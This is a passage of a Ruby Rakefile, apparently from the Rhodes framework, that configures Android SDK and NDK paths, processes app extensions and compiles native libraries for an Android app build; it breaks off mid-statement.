1 end android_api_levels = AndroidTools.get_installed_api_levels android_api_levels.sort! $found_api_level = android_api_levels.last $gapikey = $app_config["android"]["apikey"] unless $app_config["android"].nil? $gapikey = $config["android"]["apikey"] if $gapikey.nil? and not $config["android"].nil? $gapikey = '' unless $gapikey.is_a? String $gapikey = nil if $gapikey.empty? $android_orientation = $app_config["android"]["orientation"] unless $app_config["android"].nil? $use_geomapping = $app_config["android"]["mapping"] unless $app_config["android"].nil? $use_geomapping = $config["android"]["mapping"] if $use_geomapping.nil? and not $config["android"].nil? $use_geomapping = 'false' if $use_geomapping.nil? $use_geomapping = get_boolean($use_geomapping.to_s) $use_google_addon_api = false $use_google_addon_api = true if $use_geomapping #Additionally $use_google_addon_api set to true if PUSH capability is enabled $config_xml = $app_config["android"]["rhoelements"]["config"] if $app_config["android"]["rhoelements"] if $app_config["android"] if $config_xml $config_xml = File.expand_path $config_xml, $app_path puts "Custom config.xml path: #{$config_xml}" end puts "Use Google addon API: #{$use_google_addon_api}" if USE_TRACES $uri_scheme = $app_config["android"]["URIScheme"] unless $app_config["android"].nil? $uri_scheme = "http" if $uri_scheme.nil? $uri_host = $app_config["android"]["URIHost"] unless $app_config["android"].nil? # Here is switch between release/debug configuration used for # building native libraries if $app_config["debug"].nil? $build_release = true else $build_release = !$app_config["debug"].to_i end $androidpath = Jake.get_absolute $config["build"]["androidpath"] $bindir = File.join($app_path, "bin") $rhobindir = File.join($androidpath, "bin") $builddir = File.join($androidpath, "build") $shareddir = File.join($androidpath, "..", "shared") $coreapidir = File.join($androidpath, "..", "..", "lib", "commonAPI", "coreapi", "ext", "shared") $commonapidir = File.join($androidpath, "..", "..", "lib", "commonAPI") $srcdir = File.join($bindir, "RhoBundle") $targetdir = File.join($bindir, 'target', 'android') $projectpath = File.join($app_path, 'project', 'android') $excludelib = ['**/builtinME.rb', '**/ServeME.rb', '**/dateME.rb', '**/rationalME.rb'] $tmpdir = File.join($bindir, "tmp") #$rhomanifest = File.join $androidpath, "Rhodes", "AndroidManifest.xml" $rhomanifesterb = File.join $androidpath, "Rhodes", "AndroidManifest.xml.erb" $appmanifest = File.join $tmpdir, "AndroidManifest.xml" $rhores = File.join $androidpath, 'Rhodes','res' $appres = File.join $tmpdir,'res' $appassets = File.join $tmpdir,'assets' $applibs = File.join $tmpdir,'lib','armeabi' $appincdir = File.join $tmpdir, "include" $rho_java_gen_dir = File.join $tmpdir,'gen','com','rhomobile','rhodes' #$rho_android_r = File.join $androidpath, 'Rhodes','src','com','rhomobile','rhodes','AndroidR.java' #$app_android_r = File.join $rho_java_gen_dir,'AndroidR.java' $app_rjava_dir = $rho_java_gen_dir $app_native_libs_java = File.join $rho_java_gen_dir,'NativeLibraries.java' $app_capabilities_java = File.join $rho_java_gen_dir,'Capabilities.java' $app_push_java = File.join $rho_java_gen_dir,'Push.java' $app_startup_listeners_java = File.join $rho_java_gen_dir,'extmanager','RhodesStartupListeners.java' if RUBY_PLATFORM =~ /(win|w)32$/ $bat_ext = ".bat" $exe_ext = ".exe" $path_separator = ";" # Add PATH to cygwin1.dll ENV['CYGWIN'] = 'nodosfilewarning' if $path_cygwin_modified.nil? ENV['PATH'] = Jake.get_absolute("res/build-tools") + ";" + ENV['PATH'] path_cygwin_modified = true end else #XXX make these absolute $bat_ext = "" $exe_ext = "" $path_separator = ":" # TODO: add ruby executable for Linux end build_tools_path = nil if File.exist?(File.join($androidsdkpath, "build-tools")) build_tools_path = [] Dir.foreach(File.join($androidsdkpath, "build-tools")) do |entry| next if entry == '.' or entry == '..' build_tools_path << entry end build_tools_path.sort! build_tools_path = build_tools_path.last end if build_tools_path puts "Using Android SDK build-tools: #{build_tools_path}" build_tools_path = File.join $androidsdkpath,'build-tools',build_tools_path #puts "build-tools path: #{build_tools_path}" #$dx = File.join(build_tools_path,"dx" + $bat_ext) $dxjar = File.join(build_tools_path,'lib','dx.jar') $aapt = File.join(build_tools_path, "aapt#{$exe_ext}") else #$dx = File.join($androidsdkpath, "platforms", $androidplatform, "tools", "dx" + $bat_ext) #$dx = File.join($androidsdkpath, "platform-tools", "dx" + $bat_ext) unless File.exists? $dx $dxjar = File.join($androidsdkpath, "platforms", $androidplatform, "tools", "lib", "dx.jar") $dxjar = File.join($androidsdkpath, "platform-tools", "lib", "dx.jar") unless File.exists? $dxjar $aapt = File.join($androidsdkpath, "platforms", $androidplatform, "tools", "aapt" + $exe_ext) $aapt = File.join($androidsdkpath, "platform-tools", "aapt" + $exe_ext) unless File.exists? $aapt end $androidbin = File.join($androidsdkpath, "tools", "android" + $bat_ext) $adb = File.join($androidsdkpath, "tools", "adb" + $exe_ext) $adb = File.join($androidsdkpath, "platform-tools", "adb" + $exe_ext) unless File.exists? $adb $zipalign = File.join($androidsdkpath, "tools", "zipalign" + $exe_ext) $androidjar = File.join($androidsdkpath, "platforms", $androidplatform, "android.jar") $sdklibjar = File.join($androidsdkpath, 'tools', 'lib', 'sdklib.jar') $keytool = File.join($java, "keytool" + $exe_ext) $jarsigner = File.join($java, "jarsigner" + $exe_ext) $jarbin = File.join($java, "jar" + $exe_ext) $keystore = nil $keystore = $app_config["android"]["production"]["certificate"] if !$app_config["android"].nil? and !$app_config["android"]["production"].nil? $keystore = $config["android"]["production"]["certificate"] if $keystore.nil? and !$config["android"].nil? and !$config["android"]["production"].nil? $keystore = File.expand_path($keystore, $app_path) unless $keystore.nil? $keystore = File.expand_path(File.join(ENV['HOME'], ".rhomobile", "keystore")) if $keystore.nil? $storepass = nil $storepass = $app_config["android"]["production"]["password"] if !$app_config["android"].nil? and !$app_config["android"]["production"].nil? $storepass = $config["android"]["production"]["password"] if $storepass.nil? and !$config["android"].nil? and !$config["android"]["production"].nil? $storepass = "81719ef3a881469d96debda3112854eb" if $storepass.nil? $keypass = $storepass $storealias = nil $storealias = $app_config["android"]["production"]["alias"] if !$app_config["android"].nil? and !$app_config["android"]["production"].nil? $storealias = $config["android"]["production"]["alias"] if $storealias.nil? and !$config["android"].nil? and !$config["android"]["production"].nil? $storealias = "rhomobile.keystore" if $storealias.nil? $app_config["capabilities"] += ANDROID_CAPS_ALWAYS_ENABLED $app_config["capabilities"].map! { |cap| cap.is_a?(String) ? cap : nil }.delete_if { |cap| cap.nil? } $use_google_addon_api = true unless $app_config["capabilities"].index("push").nil? $appname = $app_config["name"] $appname = "Rhodes" if $appname.nil? $vendor = $app_config["vendor"] if $vendor.nil? if $app_config['capabilities'].index('motorola').nil? and $app_config['capabilities'].index('motoroladev').nil? $vendor = 'rhomobile' else $vendor = 'motorolasolutions' end end $vendor = $vendor.gsub(/^[^A-Za-z]/, '_').gsub(/[^A-Za-z0-9]/, '_').gsub(/_+/, '_').downcase $app_package_name = $app_config["android"] ? $app_config["android"]["package_name"] : nil $app_package_name = "com.#{$vendor}." + $appname.downcase.gsub(/[^A-Za-z_0-9]/, '') unless $app_package_name $app_package_name.gsub!(/\.[\d]/, "._") puts "$vendor = #{$vendor}" puts "$app_package_name = #{$app_package_name}" if $uri_host.nil? if $app_config['capabilities'].index('motorola').nil? and $app_config['capabilities'].index('motoroladev').nil? $uri_host = 'rhomobile.com' else $uri_host = 'motorolasolutions.com' end $uri_path_prefix = "/#{$app_package_name}" end unless $app_config['capabilities'].index('motorola').nil? and $app_config['capabilities'].index('motoroladev').nil? $use_motosol_api = true $use_motosol_api_classpath = true unless $app_config['capabilities'].index('motoroladev').nil? raise 'Cannot use Motorola SDK addon and Google SDK addon together!' if $use_google_addon_api end $applog_path = nil $applog_file = $app_config["applog"] if !$applog_file.nil? $applog_path = File.join($app_path, $applog_file) end if $min_sdk_level > $found_api_level raise "Latest installed Android platform '#{$androidplatform}' does not meet minSdk '#{$min_sdk_level}' requirement" end # Look for Motorola SDK addon if $use_motosol_api_classpath puts "Looking for Motorola API SDK add-on..." if USE_TRACES motosol_jars = ['com.motorolasolutions.scanner', 'com.motorolasolutions.msr'] $motosol_classpath = AndroidTools::get_addon_classpath(motosol_jars) end # Detect Google API add-on path if $use_google_addon_api puts "Looking for Google API SDK add-on..." if USE_TRACES google_jars = ['com.google.android.maps'] $google_classpath = AndroidTools::get_addon_classpath(google_jars, $found_api_level) end setup_ndk($androidndkpath, $found_api_level) $std_includes = File.join $androidndkpath, "sources", "cxx-stl", "stlport", "stlport" unless File.directory? $std_includes $stlport_includes = File.join $shareddir, "stlport", "stlport" USE_OWN_STLPORT = true end $native_libs = ["sqlite", "curl", "stlport", "ruby", "json", "rhocommon", "rhodb", "rholog", "rhosync", "rhomain"] if $build_release $confdir = "release" else $confdir = "debug" end $app_builddir = File.join($bindir, 'target', 'android', $confdir) $objdir = {} $libname = {} $native_libs.each do |x| $objdir[x] = File.join($tmpdir, x) $libname[x] = File.join($app_builddir, x, "lib#{x}.a") end $push_sender = nil $push_sender = $config["android"]["push"]["sender"] if !$config["android"].nil? and !$config["android"]["push"].nil? $push_sender = $app_config["android"]["push"]["sender"] if !$app_config["android"].nil? and !$app_config["android"]["push"].nil? $push_sender = "[email protected]" if $push_sender.nil? $push_notifications = nil $push_notifications = $app_config["android"]["push"]["notifications"] if !$app_config["android"].nil? and !$app_config["android"]["push"].nil? $push_notifications = "none" if $push_notifications.nil? $push_notifications = $push_notifications # Detect android targets $androidtargets = {} id = nil apilevel = nil target_name = nil `"#{$androidbin}" list targets`.split(/\n/).each do |line| line.chomp! if line =~ /^id:\s+([0-9]+)\s+or\s+\"(.*)\"/ id = $1 target_name = $2 if $use_google_addon_api if line =~ /Google Inc\.:Google APIs:([0-9]+)/ apilevel = $1.to_i $androidtargets[apilevel] = {:id => id.to_i, :name => target_name} end else if $use_motosol_api if line =~ /MotorolaSolutions\s+Inc\.:MotorolaSolution\s+Value\s+Add\s+APIs.*:([0-9]+)/ apilevel = $1.to_i $androidtargets[apilevel] = {:id => id.to_i, :name => target_name} end end end end unless $use_google_addon_api and $use_motosol_api if line =~ /^\s+API\s+level:\s+([0-9]+)$/ apilevel = $1.to_i $androidtargets[apilevel] = {:id => id.to_i, :name => target_name} end end if apilevel && $androidtargets[apilevel][:id] == id.to_i if line =~ /^\s+ABIs\s*:\s+(.*)/ $androidtargets[apilevel][:abis] = [] $1.split(/,\s*/).each do |abi| $androidtargets[apilevel][:abis] << abi end puts $androidtargets[apilevel][:abis].inspect if USE_TRACES end end end if USE_TRACES puts "Android targets:" puts $androidtargets.inspect end mkdir_p $bindir if not File.exists? $bindir mkdir_p $rhobindir if not File.exists? $rhobindir mkdir_p $targetdir if not File.exists? $targetdir mkdir_p $srcdir if not File.exists? $srcdir end #task 'config:android' namespace 'android' do # 'config:android:app_config' task is invoked directly by common Rakefile # just after build config has been read and before processing extensions task :app_config do if $app_config['capabilities'].index('push') $app_config['extensions'] << 'gcm-push' unless $app_config['extensions'].index('gcm-push') end if $app_config['capabilities'].index('native_browser') $app_config['extensions'].delete('rhoelements') end end task :extensions => ['config:android', 'build:bundle:noxruby'] do $ext_android_rhodes_activity_listener = [] $ext_android_additional_sources = {} $ext_android_additional_lib = [] $ext_android_build_scripts = {} $ext_android_manifest_changes = {} $ext_android_adds = {} $ext_android_library_deps = {} $app_config["extensions"].each do |ext| puts "#{ext} is processing..." $app_config["extpaths"].each do |p| extpath = File.join(p, ext, 'ext') puts "Checking extpath: #{extpath}" if File.exists? extpath and File.directory? extpath puts "#{extpath} is configuring..." extyml = File.join(p, ext, "ext.yml") if File.file? extyml puts "#{extyml} is processing..." extconf = Jake.config(File.open(extyml)) extconf_android = extconf['android'] exttype = 'build' exttype = extconf_android['exttype'] if extconf_android and extconf_android['exttype'] addspath = File.join($app_builddir, 'extensions', ext, 'adds') prebuiltpath = nil if exttype == 'prebuilt' prebuiltpath = Dir.glob(File.join(extpath, '**', 'android')) if prebuiltpath.count == 1 prebuiltpath = prebuiltpath.first else raise "android:exttype is 'prebuilt' but prebuilt path is not found #{prebuiltpath.inspect}" end end android_listener = extconf["android_rhodes_activity_listener"] android_listener = extconf_android['rhodes_listener'] if android_listener.nil? and extconf_android $ext_android_rhodes_activity_listener << android_listener unless android_listener.nil? manifest_changes = extconf["android_manifest_changes"] manifest_changes = extconf_android['manifest_changes'] if manifest_changes.nil? and extconf_android if manifest_changes manifest_changes = [manifest_changes] unless manifest_changes.is_a? Array manifest_changes.map! { |path| File.join(p, ext, path) } else if prebuiltpath manifest_changes = [] path = File.join(prebuiltpath, 'adds', 'AndroidManifest.rb') manifest_changes << path if File.file? path templates = Dir.glob File.join(prebuiltpath, 'adds', '*.erb') manifest_changes += templates if templates.empty? path = File.join(prebuiltpath, 'adds', 'AndroidManifest.xml') manifest_changes << path if File.file? path end end end if manifest_changes $ext_android_manifest_changes[ext] = manifest_changes end resource_addons = extconf["android_resources_addons"] resource_addons = extconf_android['adds'] if resource_addons.nil? and extconf_android if resource_addons resource_addons = File.join(p, ext, resource_addons) else if prebuiltpath resource_addons = File.join(prebuiltpath, 'adds') resource_addons = nil unless File.directory? resource_addons end end if resource_addons $ext_android_adds[ext] = resource_addons end library_deps = extconf_android['library_deps'] if extconf_android if library_deps if library_deps.is_a? Array library_deps.each do |dep| deppath = File.join($androidsdkpath, dep) $ext_android_library_deps[AndroidTools.read_manifest_package(deppath)] = deppath end end end additional_sources = extconf["android_additional_sources_list"] additional_sources = extconf_android['source_list'] if additional_sources.nil? and extconf_android unless additional_sources.nil? ext_sources_list = File.join(p, ext, additional_sources) if File.exists? ext_sources_list $ext_android_additional_sources[File.join(p, ext)] = ext_sources_list else raise "Extension java source list is missed: #{ext_sources_list}" end else puts "No additional java sources for '#{ext}'" end # there is no 'additional_libs' param in android section moreover # place libraries into android adds folder android_additional_lib = extconf["android_additional_lib"] if android_additional_lib != nil android_additional_lib.each do |lib| $ext_android_additional_lib << File.join(p, ext, lib) end end if prebuiltpath targetpath = File.join $app_builddir, 'extensions', ext libaddspath = File.join addspath, 'lib', 'armeabi' mkdir_p targetpath Dir.glob(File.join(prebuiltpath, 'lib*.a')).each do |lib| cp lib, targetpath end Dir.glob(File.join(prebuiltpath, '*.jar')).each do |lib| cp lib, targetpath end Dir.glob(File.join(prebuiltpath, '**', 'lib*.so')).each do |lib| next if lib =~ /adds/ if lib =~ /noautoload/ mkdir_p File.join(libaddspath, 'noautoload') cp lib, File.join(libaddspath, 'noautoload') else mkdir_p libaddspath cp lib, libaddspath end end end puts "#{extyml} is processed" end if exttype == 'rakefile' rakedir = Dir.glob File.join(extpath, '**', 'android') $ext_android_build_scripts[ext] = [rakedir.first, 'rake'] else build_script = File.join(extpath, 'build' + $bat_ext) if File.exists? build_script if RUBY_PLATFORM =~ /(win|w)32$/ $ext_android_build_scripts[ext] = [extpath, 'build.bat'] else $ext_android_build_scripts[ext] = [extpath, File.join('.', 'build' + $bat_ext)] end end end puts "#{extpath} is configured" # to prevent to build 2 extensions with same name break end # exists? end # $app_config["extpaths"].each end # $app_config["extensions"].each puts "Extensions' java source lists: #{$ext_android_additional_sources.inspect}" end #task :extensions task :emulator => "config:android" do $emuversion = $app_config["android"]["version"] unless $app_config["android"].nil? $emuversion = $config["android"]["version"] if $emuversion.nil? and !$config["android"].nil? if RUBY_PLATFORM =~ /(win|w)32$/ $emulator = #"cmd /c " + File.join($androidsdkpath, "tools", "emulator.exe") else $emulator = File.join($androidsdkpath, "tools", "emulator") end $emuversion = AndroidTools.get_market_version($min_sdk_level) if $emuversion.nil? if $emuversion.nil? raise "Wrong Android emulator version: #{$emuversion}. Android SDK target API is not installed" end if USE_TRACES puts "Android emulator version: #{$emuversion}" end $emuversion = $emuversion.to_s $appavdname = $app_config["android"]["emulator"] if $app_config["android"] != nil && $app_config["android"].length > 0 $appavdname = $config["android"]["emulator"] if $appavdname.nil? and !$config["android"].nil? and $config["android"].length > 0 end # task 'config:android:emulator' task :device => "config:android" do end end #namespace 'config:android' end namespace "build" do namespace "android" do desc "Build RhoBundle for android" task :rhobundle => ["config:android", :extensions] do Rake::Task["build:bundle:noxruby"].invoke rm_rf $appassets mkdir_p $appassets hash = nil ["apps", "db", "lib"].each do |d| cp_r File.join($srcdir, d), $appassets, :preserve => true # Calculate hash of directories hash = get_dir_hash(File.join($srcdir, d), hash) end File.open(File.join($srcdir, "hash"), "w") { |f| f.write(hash.hexdigest) } File.open(File.join($srcdir, "name"), "w") { |f| f.write($appname) } Jake.build_file_map($srcdir, "rho.dat") ["apps", "db", "lib", "hash", "name", "rho.dat"].each do |d| cp_r File.join($srcdir, d), $appassets, :preserve => true end end desc "Build RhoBundle for Eclipse project" task :eclipsebundle => "build:android:rhobundle" do eclipse_assets = File.join(Jake.get_absolute($androidpath), "Rhodes", "assets") rm_rf eclipse_assets cp_r $appassets, eclipse_assets, :preserve => true end desc 'Building native extensions' task :extensions => ["config:android:extensions", :genconfig] do Rake::Task["build:bundle:noxruby"].invoke ENV['RHO_PLATFORM'] = 'android' ENV["RHO_APP_DIR"] = $app_path ENV["ANDROID_SDK"] = $androidsdkpath ENV["ANDROID_NDK"] = $androidndkpath ENV["ANDROID_API_LEVEL"] = $found_api_level.to_s ENV["RHO_ROOT"] = $startdir ENV["BUILD_DIR"] ||= $startdir + "/platform/android/build" ENV["RHO_INC"] = $appincdir ENV["RHO_RES"] = $appres ENV["RHO_ANDROID_TMP_DIR"] = $tmpdir ENV["NEON_ROOT"] = $neon_root unless $neon_root.nil? ENV["CONFIG_XML"] = $config_xml unless $config_xml.nil? $ext_android_build_scripts.each do |ext, builddata| #ext = File.basename(File.dirname(extpath)) ENV["TARGET_TEMP_DIR"] = File.join($app_builddir, 'extensions', ext) ENV['TEMP_FILES_DIR'] = File.join($tmpdir, ext) mkdir_p ENV["TARGET_TEMP_DIR"] unless File.directory? ENV["TARGET_TEMP_DIR"] mkdir_p ENV["TEMP_FILES_DIR"] unless File.directory? ENV["TEMP_FILES_DIR"] puts "Executing extension build script: #{ext}" if RUBY_PLATFORM =~ /(win|w)32$/ || (builddata[1] == 'rake') Jake.run(builddata[1], [], builddata[0]) else currentdir = Dir.pwd() Dir.chdir builddata[0] sh %{$SHELL #{builddata[1]}} Dir.chdir currentdir end raise "Cannot build #{builddata[0]}" unless $?.success? puts "Extension build script finished" end $ext_android_manifest_changes.each do |ext, manifest_changes| addspath = File.join($app_builddir, 'extensions', ext, 'adds') mkdir_p addspath manifest_changes.each do |path| if File.extname(path) == '.xml' cp path, File.join(addspath, 'AndroidManifest.xml') else if File.extname(path) == '.rb' cp path, File.join(addspath, 'AndroidManifest.rb') else if File.extname(path) == '.erb' cp path, addspath else raise "Wrong AndroidManifest patch file: #{path}" end end end end end $ext_android_adds.each do |ext, path| addspath = File.join($app_builddir, 'extensions', ext, 'adds') mkdir_p addspath Dir.glob(File.join(path, '*')).each do |add| cp_r add, addspath if File.directory? add end end #$ext_android_library_deps.each do |package, path| # res = File.join path, 'res' # assets = File.join path, 'assets' # addspath = File.join($app_builddir, 'extensions', package, 'adds') # mkdir_p addspath # cp_r res, addspath if File.directory? res # cp_r assets, addspath if File.directory? assets #end end #task :extensions task :libsqlite => "config:android" do srcdir = File.join($shareddir, "sqlite") objdir = $objdir["sqlite"] libname = $libname["sqlite"] sourcelist = File.join($builddir, 'libsqlite_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = ["-I\"#{srcdir}\"", "-I\"#{$shareddir}\""] sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :libcurl => "config:android" do # Steps to get curl_config.h from fresh libcurl sources: #export PATH=<ndkroot>/build/prebuilt/linux-x86/arm-eabi-4.2.1/bin:$PATH #export CC=arm-eabi-gcc #export CPP=arm-eabi-cpp #export CFLAGS="--sysroot <ndkroot>/build/platforms/android-3/arch-arm -fPIC -mandroid -DANDROID -DOS_ANDROID" #export CPPFLAGS="--sysroot <ndkroot>/build/platforms/android-3/arch-arm -fPIC -mandroid -DANDROID -DOS_ANDROID" #./configure --without-ssl --without-ca-bundle --without-ca-path --without-libssh2 --without-libidn --disable-ldap --disable-ldaps --host=arm-eabi srcdir = File.join $shareddir, "curl", "lib" objdir = $objdir["curl"] libname = $libname["curl"] sourcelist = File.join($builddir, 'libcurl_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-DHAVE_CONFIG_H" args << "-I\"#{srcdir}/../include\"" args << "-I\"#{srcdir}\"" args << "-I\"#{$shareddir}\"" sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :libruby => "config:android" do srcdir = File.join $shareddir, "ruby" objdir = $objdir["ruby"] libname = $libname["ruby"] sourcelist = File.join($builddir, 'libruby_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-Wno-uninitialized" args << "-Wno-missing-field-initializers" args << '-Wno-shadow' args << "-I\"#{srcdir}/include\"" args << "-I\"#{srcdir}/android\"" args << "-I\"#{srcdir}/generated\"" args << "-I\"#{srcdir}\"" args << "-I\"#{srcdir}/..\"" args << "-I\"#{srcdir}/../sqlite\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :libjson => "config:android" do srcdir = File.join $shareddir, "json" objdir = $objdir["json"] libname = $libname["json"] sourcelist = File.join($builddir, 'libjson_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{srcdir}\"" args << "-I\"#{srcdir}/..\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :libstlport => "config:android" do if USE_OWN_STLPORT objdir = $objdir["stlport"] libname = $libname["stlport"] sourcelist = File.join($builddir, 'libstlport_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{$stlport_includes}\"" args << "-DTARGET_OS=android" args << "-DOSNAME=android" args << "-DCOMPILER_NAME=gcc" args << "-DBUILD_OSNAME=android" args << "-D_REENTRANT" args << "-D__NEW__" args << "-ffunction-sections" args << "-fdata-sections" args << "-fno-rtti" args << "-fno-exceptions" sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end end task :librholog => "config:android" do srcdir = File.join $shareddir, "logging" objdir = $objdir["rholog"] libname = $libname["rholog"] sourcelist = File.join($builddir, 'librholog_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{srcdir}/..\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :librhomain => "config:android" do srcdir = $shareddir objdir = $objdir["rhomain"] libname = $libname["rhomain"] sourcelist = File.join($builddir, 'librhomain_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{srcdir}\"" args << "-I\"#{$commonapidir}\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :librhocommon => "config:android" do objdir = $objdir["rhocommon"] libname = $libname["rhocommon"] sourcelist = File.join($builddir, 'librhocommon_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{$shareddir}\"" args << "-I\"#{$shareddir}/curl/include\"" args << "-I\"#{$shareddir}/ruby/include\"" args << "-I\"#{$shareddir}/ruby/android\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :librhodb => "config:android" do srcdir = File.join $shareddir, "db" objdir = $objdir["rhodb"] libname = $libname["rhodb"] sourcelist = File.join($builddir, 'librhodb_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{srcdir}\"" args << "-I\"#{srcdir}/..\"" args << "-I\"#{srcdir}/../sqlite\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :librhosync => "config:android" do srcdir = File.join $shareddir, "sync" objdir = $objdir["rhosync"] libname = $libname["rhosync"] sourcelist = File.join($builddir, 'librhosync_build.files') mkdir_p objdir mkdir_p File.dirname(libname) args = [] args << "-I\"#{srcdir}\"" args << "-I\"#{srcdir}/..\"" args << "-I\"#{srcdir}/../sqlite\"" args << "-I\"#{$std_includes}\"" unless $std_includes.nil? args << "-D__NEW__" if USE_OWN_STLPORT args << "-I\"#{$stlport_includes}\"" if USE_OWN_STLPORT sources = get_sources sourcelist objects = get_objects sources, objdir cc_build sources, objdir, args or exit 1 cc_ar ('"'+(libname)+'"'), objects.collect { |x| '"'+x+'"' } or exit 1 end task :libs => [:libsqlite, :libcurl, :libruby, :libjson, :libstlport, :librhodb, :librhocommon, :librhomain, :librhosync, :librholog] task :genconfig => "config:android" do mkdir_p $appincdir unless File.directory? $appincdir # Generate genconfig.h genconfig_h = File.join($appincdir, 'genconfig.h') gapi_already_enabled = false caps_already_enabled = {} #ANDROID_PERMISSIONS.keys.each do |k| # caps_already_enabled[k] = false #end if File.file? genconfig_h File.open(genconfig_h, 'r') do |f| while line = f.gets if line =~ /^\s*#\s*define\s+RHO_GOOGLE_API_KEY\s+"[^"]*"\s*$/ gapi_already_enabled = true else ANDROID_PERMISSIONS.keys.each do |k| if line =~ /^\s*#\s*define\s+RHO_CAP_#{k.upcase}_ENABLED\s+(.*)\s*$/ value = $1.strip if value == 'true' caps_already_enabled[k] = true elsif value == 'false' caps_already_enabled[k] = false else raise "Unknown value for the RHO_CAP_#{k.upcase}_ENABLED: #{value}" end end end end end end end regenerate = false regenerate = true unless File.file? genconfig_h regenerate = $use_geomapping != gapi_already_enabled unless regenerate caps_enabled = {} ANDROID_PERMISSIONS.keys.each do |k| caps_enabled[k] = $app_config["capabilities"].index(k) != nil regenerate = true if caps_already_enabled[k].nil? or caps_enabled[k] != caps_already_enabled[k] end puts caps_enabled.inspect if regenerate puts "Need to regenerate genconfig.h" $stdout.flush File.open(genconfig_h, 'w') do |f| f.puts "#ifndef RHO_GENCONFIG_H_411BFA4742CF4F2AAA3F6B411ED7514F" f.puts "#define RHO_GENCONFIG_H_411BFA4742CF4F2AAA3F6B411ED7514F" f.puts "" f.puts "#define RHO_GOOGLE_API_KEY \"#{$gapikey}\"" if $gapikey caps_enabled.each do |k, v| f.puts "#define RHO_CAP_#{k.upcase}_ENABLED #{v ? "true" : "false"}" end f.puts "" f.puts "#endif /* RHO_GENCONFIG_H_411BFA4742CF4F2AAA3F6B411ED7514F */" end else puts "No need to regenerate genconfig.h" $stdout.flush end # Generate rhocaps.inc #rhocaps_inc = File.join($appincdir, 'rhocaps.inc') #caps_already_defined = [] #if File.exists? rhocaps_inc # File.open(rhocaps_inc, 'r') do |f| # while line = f.gets # next unless line =~ /^\s*RHO_DEFINE_CAP\s*\(\s*([A-Z_]*)\s*\)\s*\s*$/ # caps_already_defined << $1.downcase # end # end #end # #if caps_already_defined.sort.uniq != ANDROID_PERMISSIONS.keys.sort.uniq # puts "Need to regenerate rhocaps.inc" # $stdout.flush # File.open(rhocaps_inc, 'w') do |f| # ANDROID_PERMISSIONS.keys.sort.each do |k| # f.puts "RHO_DEFINE_CAP(#{k.upcase})" # end # end #else # puts "No need to regenerate rhocaps.inc" # $stdout.flush #end end task :librhodes => [:libs, :extensions, :genconfig] do srcdir = File.join $androidpath, "Rhodes", "jni", "src" libdir = File.join $app_builddir, 'librhodes', 'lib', 'armeabi' objdir = File.join $tmpdir, 'librhodes' libname = File.join libdir, 'librhodes.so' sourcelist = File.join($builddir, 'librhodes_build.files') mkdir_p libdir mkdir_p objdir # add licence lib to build lic_dst = File.join $app_builddir, 'librhodes', 'libMotorolaLicence.a' lic_src = $startdir + "/res/libs/motorolalicence/android/libMotorolaLicence.a" rm_f lic_dst cp lic_src, lic_dst args = [] args << "-I\"#{$appincdir}\"" args << "-I\"#{srcdir}/../include\"" args << "-I\"#{srcdir}/../include/rhodes/details\"" args << "-I\"#{$shareddir}\"" args << "-I\"#{$shareddir}/common\"" args << "-I\"#{$shareddir}/api_generator\"" args << "-I\"#{$shareddir}/sqlite\"" args << "-I\"#{$shareddir}/curl/include\"" args << "-I\"#{$shareddir}/ruby/include\"" args << "-I\"#{$shareddir}/ruby/android\"" args << "-I\"#{$coreapidir}\"" args << 